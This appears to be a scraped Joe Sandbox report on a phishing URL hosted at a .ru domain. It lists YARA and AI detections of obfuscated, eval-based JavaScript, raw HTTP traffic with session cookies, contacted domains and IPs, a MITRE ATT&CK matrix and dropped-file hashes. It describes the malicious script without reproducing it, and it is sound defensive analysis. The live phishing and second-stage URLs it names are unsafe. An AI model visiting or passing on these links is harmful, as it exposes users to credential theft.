Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://7pj1.chuseruc.ru/Idsj/

Overview

General Information

Sample URL:https://7pj1.chuseruc.ru/Idsj/
Analysis ID:1619310
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1932,i,17079226105512142443,7018941396659437962,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://7pj1.chuseruc.ru/Idsj/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_63JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Yara detected HtmlPhish44
    Source: Yara matchFile source: dropped/chromecache_63, type: DROPPED
    AI detected suspicious Javascript
    Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://7pj1.chuseruc.ru/Idsj/... This script exhibits several high-risk behaviors, including dynamic code execution via the `eval` function, data exfiltration by sending user data to an untrusted domain, and the use of obfuscated code. These factors indicate a high likelihood of malicious intent, and the script should be considered a significant security risk.
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://7pj1.chuseruc.ru/Idsj/... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()`, potential data exfiltration, and the use of obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://7pj1.chuseruc.ru/Idsj/... This script demonstrates high-risk behavior, including dynamic code execution through the use of the `eval` function. It also appears to be heavily obfuscated, which is a common tactic used to conceal malicious intent. The combination of these factors indicates a high likelihood of malicious activity, and this script should be treated with extreme caution.
    Source: https://7pj1.chuseruc.ru/Idsj/HTTP Parser: No favicon
    Source: https://7pj1.chuseruc.ru/Idsj/HTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.16:55093 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /Idsj/ HTTP/1.1Host: 7pj1.chuseruc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 7pj1.chuseruc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://7pj1.chuseruc.ru/Idsj/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImR0Qk9QUi9La1FBbUFCNmxjMlhpS0E9PSIsInZhbHVlIjoiMlVGdmYwOGVrZlhCbXc2NDhyMFZlRW82Q2lFNC9PNStEYkxxVlJXTEhNb1Q1TThxM0o5OFJUWUhJSngzbWs4djlIcGJ5T2FOTS9kWXZIMTJwRitSZlNtYUFNTWkrS0JnTmpoNnR3UkdlUkNOenVjL09qdFI1MFgvUWd0aTJ5YUUiLCJtYWMiOiI5MmQ4ZGNmZjY0NzdlZWFkYTFhOWFmZjBmOGE5MTM5ZTdiNjNhOTY4MDcyNjcxNGU2ODAxMzhjNGU5ODg5N2JjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImRadG5oNFBlWTlPK29weGVCY0tSdHc9PSIsInZhbHVlIjoiN0U3WmFWcGpBaVAxOThFdDhCS29HQk1qWERwYnVhNTNiT09LM2xCOTF2Qmw1MWkvT1FzTGxZTlNPdlNzaEVwRlFKeFR0dk1adFpMbzcybTBrK2o5OXpvZnR5TUVjSjJLcEdnUmFZcU5uRXNGeDdIUklLS1NTU3VyNEVrTlJjdUwiLCJtYWMiOiJjMWIzMDc3ODhlYjg3Nzc1YzY4Y2FiYjQwNGE2Y2RjNDMxN2IyNjUzYWZhMjExN2FiZDFiZmEzNjJkNmMzMTFlIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /loray!cb32fi HTTP/1.1Host: fel.oustiono.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://7pj1.chuseruc.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7pj1.chuseruc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /loray!cb32fi HTTP/1.1Host: fel.oustiono.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: 7pj1.chuseruc.ru
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: fel.oustiono.ru
    Source: unknownHTTP traffic detected: POST /report/v4?s=e%2F9tidFol7ErcgQ1C%2FVWs4BWHp0Y8v3AaBs3X2%2BIqsTaM4OV2OfPKK3fPTVw3%2BxTIKFPSfcyURcOX83jXCRnt6jt9LWS14Rtts90A8KS%2FvXA%2BfrULU8HCLArZJhvKQ%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 426Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 18:23:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2F9tidFol7ErcgQ1C%2FVWs4BWHp0Y8v3AaBs3X2%2BIqsTaM4OV2OfPKK3fPTVw3%2BxTIKFPSfcyURcOX83jXCRnt6jt9LWS14Rtts90A8KS%2FvXA%2BfrULU8HCLArZJhvKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4922&min_rtt=4553&rtt_var=150&sent=171&recv=69&lost=0&retrans=0&sent_bytes=197826&recv_bytes=4112&delivery_rate=7360531&cwnd=228&unsent_bytes=0&cid=c1174ac0c1124e91&ts=375652&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 91484944fdc1189d-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1495&rtt_var=563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1894&delivery_rate=1941489&cwnd=181&unsent_bytes=0&cid=0696202ba3935de7&ts=1595&x=0"
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
    Source: chromecache_59.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55373 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55373
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55132
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55094
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55370
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 55121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55370 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55260
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: classification engineClassification label: mal52.phis.win@17/15@10/7
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1932,i,17079226105512142443,7018941396659437962,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://7pj1.chuseruc.ru/Idsj/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1932,i,17079226105512142443,7018941396659437962,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://7pj1.chuseruc.ru/Idsj/"Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions    		1
    Process Injection    		1
    Masquerading    		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder    		1
    Registry Run Keys / Startup Folder    		1
    Process Injection    		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer    		Traffic DuplicationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    https://7pj1.chuseruc.ru/Idsj/0%Avira URL Cloudsafe

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://7pj1.chuseruc.ru/favicon.ico0%Avira URL Cloudsafe
    https://fel.oustiono.ru/loray!cb32fi0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    		35.190.80.1
    		truefalse
      		high
      www.google.com
      		142.250.184.228
      		truefalse
        		high
        fel.oustiono.ru
        		172.67.178.176
        		truefalse
          		high
          7pj1.chuseruc.ru
          		104.21.43.76
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://7pj1.chuseruc.ru/Idsj/#servicesfalse
              		unknown
              https://7pj1.chuseruc.ru/Idsj/true
                		unknown
                https://7pj1.chuseruc.ru/favicon.icofalse
                • Avira URL Cloud: safe
                		unknown
                https://fel.oustiono.ru/loray!cb32fifalse
                • Avira URL Cloud: safe
                		unknown
                https://a.nel.cloudflare.com/report/v4?s=e%2F9tidFol7ErcgQ1C%2FVWs4BWHp0Y8v3AaBs3X2%2BIqsTaM4OV2OfPKK3fPTVw3%2BxTIKFPSfcyURcOX83jXCRnt6jt9LWS14Rtts90A8KS%2FvXA%2BfrULU8HCLArZJhvKQ%3D%3Dfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.43.76
                  		7pj1.chuseruc.ruUnited States
                  		13335CLOUDFLARENETUSfalse
                  172.67.178.176
                  		fel.oustiono.ruUnited States
                  		13335CLOUDFLARENETUSfalse
                  239.255.255.250
                  		unknownReserved
                  		unknownunknownfalse
                  35.190.80.1
                  		a.nel.cloudflare.comUnited States
                  		15169GOOGLEUSfalse
                  142.250.184.228
                  		www.google.comUnited States
                  		15169GOOGLEUSfalse
                  104.21.31.170
                  		unknownUnited States
                  		13335CLOUDFLARENETUSfalse

                  Private

                  IP
                  192.168.2.16

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1619310
                  Start date and time:2025-02-19 19:22:23 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://7pj1.chuseruc.ru/Idsj/
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:13
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal52.phis.win@17/15@10/7
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 217.20.57.20, 172.217.16.195, 66.102.1.84, 142.250.185.110, 142.250.186.174, 142.250.186.142, 142.250.185.78, 172.217.16.202, 142.250.185.99, 142.250.186.78, 142.250.184.206, 199.232.210.172, 142.250.181.238, 142.250.185.174, 142.250.186.99, 142.250.186.110, 142.250.185.142, 199.232.214.172, 142.250.185.206, 2.19.106.160, 2.19.244.127, 172.202.163.200, 13.107.246.60
                  • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: https://7pj1.chuseruc.ru/Idsj/

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 19 17:23:05 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2673
                  Entropy (8bit):3.9890951125026874
                  Encrypted:false
                  SSDEEP:48:8OdwT0gdHIUidAKZdA1FehwiZUklqehTy+3:8Jf1gy
                  MD5:431EF8E763BF11C50BBC9D20F00296AA
                  SHA1:24E00E1EC7111454DBA9AE3179DD80826205D8F0
                  SHA-256:84180E4B27D42D6C1EC0C2771ED87AE57BA4C657BA938372AC0E90CDBD6DA167
                  SHA-512:B7ED5DC492E370518372FC7BC01695319E8BDEBDF967AE221775BE6883EB7662E297CBC24B9D446C5791C36185765E52A3786BFE9B033FE41EABB044B11EE5DD
                  Malicious:false
                  Reputation:low
                  Preview:L..................F.@.. ...$+.,.....X.Q....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.ISZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VSZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VSZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VSZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VSZ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 19 17:23:05 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2675
                  Entropy (8bit):4.002855094865564
                  Encrypted:false
                  SSDEEP:48:81dwT0gdHIUidAKZdA1seh/iZUkAQkqehQy+2:84fr9Q5y
                  MD5:BD6DAFC62D54E4ACE1FF5D5CD7DA0FD5
